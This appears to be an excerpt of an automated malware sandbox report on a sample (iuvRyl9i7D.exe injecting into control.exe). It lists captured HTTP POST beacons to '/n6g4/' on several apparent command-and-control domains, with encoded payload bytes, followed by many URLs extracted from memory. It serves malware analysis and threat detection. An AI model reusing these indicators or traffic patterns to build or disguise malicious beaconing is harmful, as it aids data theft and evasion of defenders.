Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 62 6c 5f 30 63 7e 41 70 57 36 7a 77 43 37 73 6e 64 69 62 74 4c 7e 42 6d 38 77 36 4d 76 48 76 67 79 33 58 4f 6c 39 54 50 49 38 45 63 34 50 74 4e 68 53 44 74 5f 7a 44 28 38 4e 79 30 31 42 56 65 30 39 63 44 35 50 51 73 38 53 55 6c 51 51 70 76 54 5a 46 59 55 45 4e 71 53 54 56 38 42 30 4d 57 47 35 47 65 53 6f 49 73 70 4a 58 72 50 33 41 79 48 72 68 77 71 6e 5f 50 6b 48 74 6a 64 79 79 43 69 42 5a 44 54 33 46 59 42 62 68 6d 6e 72 69 30 52 38 58 38 59 71 37 78 34 39 64 59 54 65 71 68 66 69 4a 70 6c 63 49 53 2d 70 4a 4e 32 75 65 74 47 65 4c 32 4d 62 76 62 53 72 5f 7a 6b 68 46 74 61 76 50 50 46 28 6f 77 52 77 6d 4c 47 74 4f 7e 7a 63 67 46 44 36 59 4e 4a 77 55 77 6a 62 6b 4d 4b 76 70 30 6b 41 54 6b 69 36 5f 6f 7a 66 67 6e 52 42 79 79 49 78 6f 6b 32 76 79 30 31 37 55 6d 6f 77 73 5a 71 37 51 42 54 4a 4f 35 70 42 4c 6f 49 6b 53 46 74 77 66 37 66 52 67 57 63 46 6e 65 58 56 45 72 66 61 4a 68 39 63 41 53 43 78 42 79 4e 62 45 43 32 58 44 69 77 66 67 49 59 7a 6e 33 44 43 36 6c 6a 41 46 79 4c 57 39 70 51 64 41 73 63 71 6b 7a 31 59 31 55 30 47 4d 4d 33 72 33 39 77 75 55 36 71 76 64 59 79 69 6d 71 5f 6e 68 69 33 49 6b 7e 48 7e 70 37 75 62 42 36 45 31 55 69 5a 6e 73 47 77 73 79 28 37 7a 35 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=RpLgIbl_0c~ApW6zwC7sndibtL~Bm8w6MvHvgy3XOl9TPI8Ec4PtNhSDt_zD(8Ny01BVe09cD5PQs8SUlQQpvTZFYUENqSTV8B0MWG5GeSoIspJXrP3AyHrhwqn_PkHtjdyyCiBZDT3FYBbhmnri0R8X8Yq7x49dYTeqhfiJplcIS-pJN2uetGeL2MbvbSr_zkhFtavPPF(owRwmLGtO~zcgFD6YNJwUwjbkMKvp0kATki6_ozfgnRByyIxok2vy017UmowsZq7QBTJO5pBLoIkSFtwf7fRgWcFneXVErfaJh9cASCxByNbEC2XDiwfgIYzn3DC6ljAFyLW9pQdAscqkz1Y1U0GMM3r39wuU6qvdYyimq_nhi3Ik~H~p7ubB6E1UiZnsGwsy(7z5iA).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 61 4a 51 74 76 4b 72 32 33 47 59 6a 6e 66 6a 7a 39 79 64 75 37 4c 50 6f 59 6b 78 4f 74 28 37 39 6e 4b 76 50 67 49 47 4c 34 67 70 58 66 71 6f 4e 68 44 6e 68 70 44 66 37 63 42 78 30 31 5a 37 65 31 4a 63 43 36 50 41 73 64 44 78 6d 7a 34 6d 72 7a 5a 54 5a 55 46 4c 75 51 33 30 38 42 41 69 57 47 42 6f 64 68 38 49 73 4e 68 58 38 59 6a 4a 39 48 71 71 7e 4b 33 72 42 45 44 6a 6a 5a 6e 74 43 69 39 5a 43 6a 37 46 59 67 4c 6d 67 6b 54 74 7a 42 38 57 70 6f 71 79 7e 59 34 6b 59 54 61 49 68 61 43 4a 75 58 34 49 44 39 68 4a 4a 33 75 64 7e 32 65 4f 67 38 62 59 4e 69 6e 55 7a 6b 39 7a 74 62 62 31 4d 33 6a 6f 77 68 77 64 50 58 6c 38 30 41 31 69 48 41 6e 30 4e 4a 73 78 77 58 54 73 4d 4c 76 4a 39 79 4e 37 36 55 47 56 6f 78 7a 65 68 78 42 32 38 6f 77 30 6b 32 75 46 30 31 37 36 6d 70 67 73 5a 70 4c 51 43 77 78 4f 79 70 42 49 7e 6f 6b 55 4d 4e 77 45 28 66 55 48 57 63 63 49 65 57 4e 2d 7e 38 75 4a 69 4a 59 41 48 78 70 4f 35 4e 62 43 47 32 57 52 31 67 66 72 49 59 7a 5a 33 48 32 71 6c 51 30 46 77 65 36 39 75 7a 31 41 76 73 71 6b 32 31 59 37 64 55 4c 4a 4d 78 44 37 39 78 7e 62 36 62 72 64 59 45 57 6d 71 62 54 68 69 48 49 6b 79 6e 28 59 30 64 71 72 28 78 68 64 7a 49 33 5f 4a 51 39 59 35 37 32 30 67 54 4f 72 34 64 44 48 6e 69 53 73 75 44 55 73 49 37 43 50 35 52 46 67 62 68 4f 31 67 70 66 77 71 63 78 65 4b 52 4b 33 38 79 63 38 64 51 59 45 63 76 6f 48 6a 4f 63 52 59 30 35 44 33 4c 4d 37 38 32 4e 6e 66 6a 4a 39 28 4c 35 33 7a 6e 6f 78 78 4b 55 4a 4c 42 28 74 61 65 36 69 4a 41 61 76 65 57 6c 74 58 56 4c 78 63 49 51 46 39 34 38 74 7a 44 6a 44 71 64 63 5a 56 48 4d 44 68 45 6e 36 71 4e 7e 63 67 42 69 71 59 58 45 57 4b 48 74 55 7a 39 32 52 62 52 33 7a 37 6d 50 38 61 67 58 48 57 55 32 33 37 6e 63 6c 51 32 74 36 48 31 48 78 69 4a 48 2d 62 70 4e 70 4d 30 5a 41 36 6c 32 4a 68 55 63 4d 28 68 41 53 4c 31 6f 78 39 63 53 2d 68 61 79 43 57 43 64 64 38 5f 68 39 76 72 45 4d 38 34 68 41 28 50 43 34 50 54 6c 57 4a 32 4c 51 71 6d 6a 6e 58 42 28 47 56 47 34 4e 6f 64 72 68 75 70 34 49 7a 33 50 55 61 58 7e 57 48 59 4e 2d 76 4f 57 4d 47 56 72 6b 79 6c 61 65 77 74 4c 44 66 68 4b 69 65 4a 78 37 78 76 77 73 31 6f 46 31 6f 75 41 49 41 66 28 30 68 59 49 54 7e 68 47 76 6c 34 70 36 4c 43 63 73 55 78 5a 43 53 65 43 53 75 59 69 4a 62 5f 61 45 4c 46 61 72 6c 74 50 44 6a 58 6b 33 4d 64 71 4c 72 30 38 70 32 75 33 59 35 4b 39 37 41 48 57 6a 57 35 36 6a 66 53 6c 30 68 32 34 35 49 4c 47 5a 37 33 53 53 78 4f 65 6a 35 67 45 38 75 59 28 76 41 7a 77 77 28 62 6a 32 53 2d 34 51 76 66 58 44 76 54 28 59 64 69 47 4c 56 72 69 47 6e 39 4e 54 41 77 32 30 30 71 62 41 47 30 49 6e 7a 78 38 38 68 53 67 30 6f 71 32 4b
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 50 6c 39 44 31 61 41 74 71 5a 4c 36 5a 4f 71 77 51 61 46 76 46 6d 52 54 51 73 63 59 70 53 5a 4c 4e 54 6d 51 5a 53 5a 4b 47 37 6d 62 59 79 45 76 79 6e 74 35 74 4b 61 70 61 4b 71 69 6b 45 66 58 46 53 6d 49 73 68 71 4b 7a 47 44 36 4b 4c 68 35 37 58 35 31 2d 53 6b 63 6d 75 39 37 39 61 63 76 45 56 42 57 48 57 4d 76 6c 74 79 78 6b 71 4a 70 73 4d 68 75 75 51 6e 76 72 63 54 39 69 52 55 32 64 62 6d 76 54 4a 35 7e 4d 6d 46 74 39 41 37 47 32 74 53 46 61 6b 78 58 63 43 31 4c 61 4c 42 58 6b 7a 48 4c 58 76 50 44 57 56 38 69 59 34 6e 30 41 75 4e 6d 65 74 49 6c 7a 4a 69 4d 61 56 73 48 5a 58 50 43 48 7e 35 64 38 52 35 65 75 4b 47 6d 76 64 41 72 42 28 59 30 72 67 47 4c 50 58 65 4f 4c 39 78 63 57 4c 43 28 49 4c 37 4d 71 49 78 64 62 38 70 6b 6f 65 5a 6f 5f 6b 4b 63 72 77 45 28 54 75 38 6d 38 74 38 4c 2d 65 5f 52 6f 43 64 5a 72 78 6b 59 53 68 42 28 30 68 63 52 4a 73 74 45 59 4f 37 67 42 39 32 42 6e 61 65 45 6e 76 2d 45 34 78 5a 38 45 64 5a 72 52 74 72 37 69 6c 36 39 4f 33 73 44 67 58 58 67 4b 73 4e 41 4d 79 50 62 31 57 71 73 55 7e 55 32 4f 65 62 42 51 64 5a 76 4b 45 56 46 68 31 63 54 70 6c 55 36 44 54 47 33 48 76 31 74 77 37 6e 50 6b 69 64 41 36 79 5f 73 65 78 77 50 34 53 55 59 39 68 49 48 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=McrXvPl9D1aAtqZL6ZOqwQaFvFmRTQscYpSZLNTmQZSZKG7mbYyEvynt5tKapaKqikEfXFSmIshqKzGD6KLh57X51-Skcmu979acvEVBWHWMvltyxkqJpsMhuuQnvrcT9iRU2dbmvTJ5~MmFt9A7G2tSFakxXcC1LaLBXkzHLXvPDWV8iY4n0AuNmetIlzJiMaVsHZXPCH~5d8R5euKGmvdArB(Y0rgGLPXeOL9xcWLC(IL7MqIxdb8pkoeZo_kKcrwE(Tu8m8t8L-e_RoCdZrxkYShB(0hcRJstEYO7gB92BnaeEnv-E4xZ8EdZrRtr7il69O3sDgXXgKsNAMyPb1WqsU~U2OebBQdZvKEVFh1cTplU6DTG3Hv1tw7nPkidA6y_sexwP4SUY9hIHg).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 4f 4a 56 48 45 48 51 6f 36 55 64 35 76 43 45 37 41 4b 48 74 31 71 55 5a 79 70 45 50 34 44 39 57 5a 58 66 43 4a 36 66 4f 79 6a 48 52 5f 65 6d 76 7a 57 44 77 2d 7e 57 36 4b 4f 72 69 6b 63 41 58 46 57 6d 4c 73 5a 36 4a 55 44 6f 39 73 33 67 36 62 57 63 30 2d 54 69 59 6b 62 79 37 39 65 45 76 48 30 61 57 33 36 4d 7e 32 56 79 6d 7a 57 30 6b 73 4d 37 6e 4f 42 34 77 37 41 64 39 69 5a 4d 32 59 6a 6d 36 7a 46 35 28 6f 69 45 6b 65 34 34 4c 47 74 58 51 71 6c 6e 65 38 65 66 4c 62 28 6a 58 6b 50 48 4c 6c 62 50 46 47 31 38 79 37 41 6d 28 51 75 56 73 2d 73 58 79 6a 31 33 4d 61 4a 67 48 63 6d 79 43 32 4b 35 66 4d 52 30 62 5f 54 37 71 63 6c 58 34 51 62 76 30 72 6b 5f 4c 61 33 57 4f 4a 70 52 61 6c 54 70 78 4b 54 52 4d 76 35 55 52 62 38 6c 38 34 66 62 6f 5f 6b 4d 63 72 77 6d 28 51 47 38 6d 5f 4e 38 45 39 57 5f 58 49 43 65 51 37 78 39 53 79 68 61 75 6b 73 51 52 4a 30 54 45 63 53 42 67 30 39 32 62 57 71 65 4d 67 37 78 4f 34 78 6c 71 30 64 65 76 52 74 65 37 69 6b 74 39 50 32 6e 43 54 7a 58 67 66 59 4e 43 5a 6d 50 64 46 57 71 6a 30 7e 53 28 75 69 4c 42 55 78 64 76 4b 30 5f 45 53 35 63 64 62 42 55 36 6e 6e 47 6b 6e 76 31 68 51 36 46 4a 31 58 30 43 4c 69 79 28 65 5a 4e 53 39 7a 71 64 5f 49 47 57 56 4a 6b 61 5f 66 79 69 57 4c 6d 4b 7a 64 2d 59 73 30 5f 6d 70 61 30 71 4f 62 47 36 46 4a 48 48 68 66 5f 61 5a 7e 71 38 67 68 42 6b 4d 39 49 77 62 49 71 75 39 52 63 56 73 6f 68 55 77 58 4a 41 53 4b 6a 47 42 41 62 63 61 7a 48 4f 5f 44 49 54 55 35 31 73 64 5a 31 4d 44 39 69 78 74 63 39 58 5f 42 52 73 68 42 51 67 6b 74 34 74 65 56 7a 45 47 54 54 5a 77 44 58 43 54 28 77 7e 48 71 74 67 68 57 48 64 42 6a 72 7e 53 4f 5a 6c 70 35 6e 41 57 34 71 34 44 5a 53 50 47 54 76 63 6a 6b 67 6a 6f 67 59 62 53 4c 72 79 61 35 61 55 37 6a 78 54 51 39 44 46 51 44 44 35 67 69 51 47 6e 47 6b 52 7a 6a 73 50 4e 4a 4a 6f 79 51 61 50 54 45 57 44 75 46 46 4c 6f 30 75 78 5f 28 4f 6d 33 47 4e 56 7a 77 4b 43 33 49 36 79 54 45 6f 34 30 73 68 7e 6a 69 4e 37 4f 4c 67 4c 6b 6b 47 47 68 79 44 62 65 69 70 74 71 58 74 6b 76 48 76 6e 52 48 4e 46 44 4c 6c 32 70 63 74 49 52 7a 4e 32 70 64 56 6d 6f 4b 50 37 45 50 4d 69 44 63 50 30 62 73 66 71 6f 45 63 64 69 4c 5f 57 6c 47 66 75 4f 6e 55 49 53 6e 71 7a 61 7a 63 6f 48 41 74 48 4b 5a 32 55 48 54 50 79 79 6b 4b 7e 45 7a 64 30 4c 34 5f 4a 59 41 6d 43 58 45 37 55 59 47 4c 72 72 69 38 6a 31 53 65 55 5a 37 61 74 54 73 4d 5a 61 58 34 67 67 4e 4c 6b 54 46 57 37 46 58 49 6b 61 74 5a 6d 79 6c 6f 45 71 62 64 54 5a 43 44 39 46 53 57 6c 62 7a 70 41 78 44 58 76 50 74 47 67 38 6f 6e 47 46 46 79 51 4f 61 39 55 6a 49 63 56 71 55 2d 59 69 52 73 6c 44 6b 59 4c
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 71 51 6e 50 58 6d 4f 6f 44 77 4e 56 54 49 49 67 38 72 48 33 5f 53 4e 6f 6e 45 4e 54 43 66 44 32 43 7e 74 33 74 77 59 73 59 56 75 33 39 67 4b 78 54 4a 58 56 39 7a 70 54 69 49 58 41 59 77 54 59 32 4d 76 6e 74 54 6c 33 50 4b 6d 6d 69 72 39 65 79 52 54 71 4e 68 49 66 39 74 6c 28 57 47 4d 41 56 53 59 32 2d 72 51 70 7a 43 30 69 57 34 67 57 79 30 64 6c 36 53 5a 76 46 5a 6a 58 47 46 32 66 4f 57 4d 4b 43 79 67 75 33 34 45 6b 42 35 64 70 43 38 6d 79 77 4d 6a 6c 6f 35 66 62 30 39 75 65 6f 4f 4e 45 2d 28 52 51 2d 5a 38 32 62 56 76 77 36 30 6b 7e 4b 34 73 7e 57 48 31 4d 75 53 79 79 66 37 6e 35 39 55 30 35 70 39 38 42 34 36 36 53 59 31 44 34 6b 43 4b 73 33 56 4c 69 4c 32 70 38 49 6a 44 4d 52 4a 37 36 41 35 4e 33 51 54 77 54 63 66 48 4c 71 54 35 63 43 6d 32 77 63 77 71 50 5f 4d 69 6f 6b 75 5a 78 77 51 48 32 79 62 32 32 2d 72 38 33 43 36 7a 43 65 73 55 6d 6c 49 48 7a 4c 79 30 39 38 6a 47 54 79 39 66 53 46 63 35 7a 50 72 4c 4e 55 66 4f 59 76 68 77 74 4e 4b 61 41 7a 34 32 6f 62 6c 53 5a 2d 33 58 42 75 4e 71 55 78 71 6d 4a 49 36 43 57 37 36 6c 37 6c 45 62 6d 6b 61 75 43 34 50 73 46 66 5a 68 6a 42 73 46 6d 57 6a 46 35 31 71 31 57 4a 4e 77 28 4f 4d 68 5a 53 74 64 38 48 77 63 28 37 72 4e 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:30:03 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://ansu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://difo.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://en.wi5
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://epa.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://genzi.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gonglang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://haileng.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://hanyang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kace.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kuaicong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://maipu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://meilong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://mianta.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://nanmang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://penjian.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://qiangai.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://qunben.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://randu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://rechan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://sangdu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://sanque.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://saoshui.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://shangeng.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://tanshuan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://tuikun.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://weimen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://wudie.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
